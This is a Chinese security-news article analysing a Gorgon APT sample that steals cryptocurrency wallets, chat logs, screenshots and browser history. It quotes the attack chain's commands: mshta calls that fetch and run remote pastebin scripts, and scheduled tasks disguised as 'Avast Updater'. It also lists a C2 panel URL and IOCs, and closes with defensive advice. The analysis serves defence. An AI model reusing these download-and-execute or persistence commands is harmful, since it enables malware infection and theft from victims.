1. 威客安全首页
  2. 安全资讯

Gorgon APT黑客组织觊觎虚拟货币钱包

背景

Gorgon APT组织是一个被认为来自巴基斯坦的攻击组织,该组织在2018年8月份由Palo Alto Unit42团队进行披露,主要针对全球外贸人士进行攻击。除此之外,安全研究人员还发现Gorgon针对英国、西班牙、俄罗斯、美国等政府目标发起了攻击,算是APT组织的后起之秀,最近一年非常活跃。

近日,深信服安全团队发现了Gorgon APT组织最新变种样本,此样本释放了一个盗取受害者虚拟币钱包的木马。

Gorgon APT黑客组织觊觎虚拟货币钱包

/攻击流程图/

样本分析

1.样本中包含恶意的宏代码,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

2.通过动态调试,宏代码调用mshta.exe执行mshtahttp://bitly.com/6xdfsSXsh6,访问短链接网址http://bitly.com/6xdfsSXsh6,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

3.短链接跳转到网站,网站包含恶意脚本,如下所示:https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html

Gorgon APT黑客组织觊觎虚拟货币钱包

4.解密里面的恶意脚本,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

5.调用mshta.exe执行mshta.exe http://www.pastebin.com/raw/UZEbWMK9,访问http://www.pastebin.com/raw/UZEbWMK9网站的内容,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

6.解密上面的恶意脚本内容,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

7.调用cmd.exe程序,执行如下命令,结束相关进程:

"C:WindowsSystem32cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit

8.将以下命令,写入自启动注册表项:

mshta.exehttp://pastebin.com/raw/hJjQuQv1

9.通过命令,创建两个计划任务启动项Avast Updater和Avast backup,如下所示:

"C:WindowsSystem32schtasks.exe" /create /sc MINUTE /mo 30 /tn "Avast Updater" /tr "mshta.exehttp://pastebin.com/raw/BrH6UFRc" /F
"C:WindowsSystem32schtasks.exe" /create /sc MINUTE /mo 300 /tn "Avast backup" /tr "mshta.exehttp://pastebin.com/raw/nhcP3XgH" /F

10.上面三个自启动项,分别执行三个不同的脚本,如下所示:

http://pastebin.com/raw/hJjQuQv1http://pastebin.com/raw/BrH6UFRchttp://pastebin.com/raw/nhcP3XgH

hJjQuQv1脚本解密之后,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

BrH6UFRc脚本解密之后,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

再次解密脚本,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

11.下载https://pastebin.com/raw/dkrjWec2脚本并执行,脚本内容,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

解密脚本之后,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

12.解密之后替换里面的字符串,然后加载执行,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

13.替换之后,是一个PE文件,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

14.通过查看这个PE文件为NET编写的注入程序,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

15.将PE程序注入到calc.exe进程中,下载https://pastebin.com/raw/j8mRken0脚本内容,然后替换里面的@!并执行,脚本内容,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

16.解密脚本之后也是一个PE文件,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

17.把这个解密出来的PE程序通过上面解密出来的PE注入程序,注入到calc.exe进程中,此PE程序,盗取受害者虚拟钱包数据,例如比特币,莱特币等,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

18.盗取受害者聊天工具记录,例如:Skype、Telegram等,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

19.屏幕截图操作,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

20.获取受害者主机相关信息,当前IP地址或区域信息以及磁盘文件名等,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

21.盗取受害者浏览器历史记录信息等,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

22.远程服务器URL:http://216.170.126.139/Panel/10/index.php,捕获到的数据包流量,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

23.nhcP3XgH脚本解密之后,如下所示:

Gorgon APT黑客组织觊觎虚拟货币钱包

安全建议:

不管攻击者的入侵计划是多么的缜密,总会由于技术的限制留下些许蛛丝马迹,譬如软件的植入、网络流量的产生,这些痕迹可能并不足以作为APT攻击的证据,但一旦发现,就必须提高警惕,并及时的保存现场,通知安全相关人员,对疑似感染的主机进行隔离和检查。同时也要注意日常防范措施,在思想上和技术上双管齐下:

1、加强人员安全防范意识。不要打开来历不明的邮件附件,对于邮件附件中的文件要谨慎运行,如发现脚本或其他可执行文件可先使用杀毒软件进行扫描;

2、升级office系列软件到最新版本,不要随意运行不可信文档中的宏;

3、部署分层控制,实现深度网络安全防御,构建端到端的立体安全防护网络。在网络规划时需要充分考虑终端接入安全、内网安全防护、应用系统安全等多个维度,并根据不同的业务需求和安全等级进行合理的分区隔离;

4、重视网络数据、系统运行状态的审计和分析。严格把控系统的访问权限,持续对数据流的进出进行有效的监控,及时更新安全补丁,定时进行安全配置基线的审视和系统安全风险的评估,及时发现可以行为并通过通信线路加密、应用层安全扫描与防护、隔离等有效技术手段将可能的安全风险扼杀在摇篮里。

IOCs

MD5:

A137185171B1176FC125A74250928933

A5DE91F73A5E75AA7E33954FD0ADDA13

E0CE8A86F85C506591BE8897C07FB626

URL:

http://bitly.com/6xdfsSXsh6

https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html

http://www.pastebin.com/raw/UZEbWMK9

http://pastebin.com/raw/hJjQuQv1

http://pastebin.com/raw/BrH6UFRc

http://pastebin.com/raw/nhcP3XgH

http://216.170.126.139/Panel/10/index.php

IP :

216.170.126.139

*本文作者:深信服千里目安全实验室,转载请注明来自FreeBuf.COM

Gorgon APT黑客组织觊觎虚拟货币钱包

精彩推荐

Gorgon APT黑客组织觊觎虚拟货币钱包

Gorgon APT黑客组织觊觎虚拟货币钱包

Gorgon APT黑客组织觊觎虚拟货币钱包

Gorgon APT黑客组织觊觎虚拟货币钱包

Gorgon APT黑客组织觊觎虚拟货币钱包Gorgon APT黑客组织觊觎虚拟货币钱包Gorgon APT黑客组织觊觎虚拟货币钱包

原文始发于微信公众号(FreeBuf):Gorgon APT黑客组织觊觎虚拟货币钱包

本文转为转载文章,本文观点不代表威客安全立场。

发表评论

登录后才能评论

联系我们

4006-119-120

在线咨询:点击这里给我发消息

邮件:public@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

X